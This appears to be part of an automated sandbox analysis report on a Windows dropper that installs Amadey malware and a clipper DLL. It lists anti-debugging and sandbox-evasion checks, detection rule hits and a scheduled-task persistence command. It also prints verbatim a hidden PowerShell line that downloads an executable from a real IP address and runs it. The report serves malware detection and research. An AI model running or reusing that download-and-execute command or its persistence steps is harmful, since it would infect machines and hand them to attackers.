                  Source: powershell.exe, 00000008.00000002.1004489959.0000020058E6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:!
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESystem information queried: ModuleInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Hides threads from debuggers
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebugger
                  Potentially malicious time measurement code found
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXECode function: 10_2_04BB03F9 Start: 04BB04B1 End: 04BB040810_2_04BB03F9
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_04F802C3 Start: 04F803FF End: 04F8034E22_2_04F802C3
                  Tries to detect sandboxes and other dynamic analysis tools (window names)
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: SIWVID
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXECode function: 10_2_04BB0AA0 rdtsc 10_2_04BB0AA0
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B1EAA2 BlockInput,0_2_00B1EAA2
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AD2622
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC4CE8 mov eax, dword ptr fs:[00000030h]0_2_00AC4CE8
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00F25FF2 mov eax, dword ptr fs:[00000030h]22_2_00F25FF2
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00F1DB60 mov eax, dword ptr fs:[00000030h]22_2_00F1DB60
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00B00B62
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AD2622
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AC083F
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC09D5 SetUnhandledExceptionFilter,0_2_00AC09D5
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AC0C21

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: amsi32_6892.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi64_512.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 6472, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6892, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 5284, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 512, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B01201
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AE2BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AE2BA5
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0B226 SendInput,keybd_event,0_2_00B0B226
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00B222DA
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE "C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE" Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE "C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE" Jump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00B00B62
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B01663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00B01663
                  Source: uw7A6EF76R.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: uw7A6EF76R.exeBinary or memory string: Shell_TrayWnd
                  Source: rapes.exe, rapes.exe, 00000016.00000002.2113049150.00000000010FF000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: $x.Program Manager
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000A.00000002.957796732.000000000037F000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 0000000B.00000002.984479066.00000000010FF000.00000040.00000001.01000000.0000000F.sdmp, rapes.exe, 0000000C.00000002.990047516.00000000010FF000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: o $x.Program Manager
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC0698 cpuid 0_2_00AC0698
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AFD21C GetLocalTime,0_2_00AFD21C
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AFD27A GetUserNameW,0_2_00AFD27A
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Amadey
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Yara detected Amadeys Clipper DLL
                  Source: Yara matchFile source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.984343955.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.944161956.0000000005700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.989946070.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000003.1491050871.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1002520694.0000000000171000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.957624857.0000000000171000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000003.961859847.0000000005090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2112729465.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.917256725.0000000004980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: uw7A6EF76R.exeBinary or memory string: WIN_81
                  Source: uw7A6EF76R.exeBinary or memory string: WIN_XP
                  Source: uw7A6EF76R.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: uw7A6EF76R.exeBinary or memory string: WIN_XPe
                  Source: uw7A6EF76R.exeBinary or memory string: WIN_VISTA
                  Source: uw7A6EF76R.exeBinary or memory string: WIN_7
                  Source: uw7A6EF76R.exeBinary or memory string: WIN_8

                  Remote Access Functionality

                  barindex
                  Contains functionality to start a terminal service
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEString found in binary or memory: net start termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000A.00000002.957624857.0000000000171000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: net start termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000A.00000002.957624857.0000000000171000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 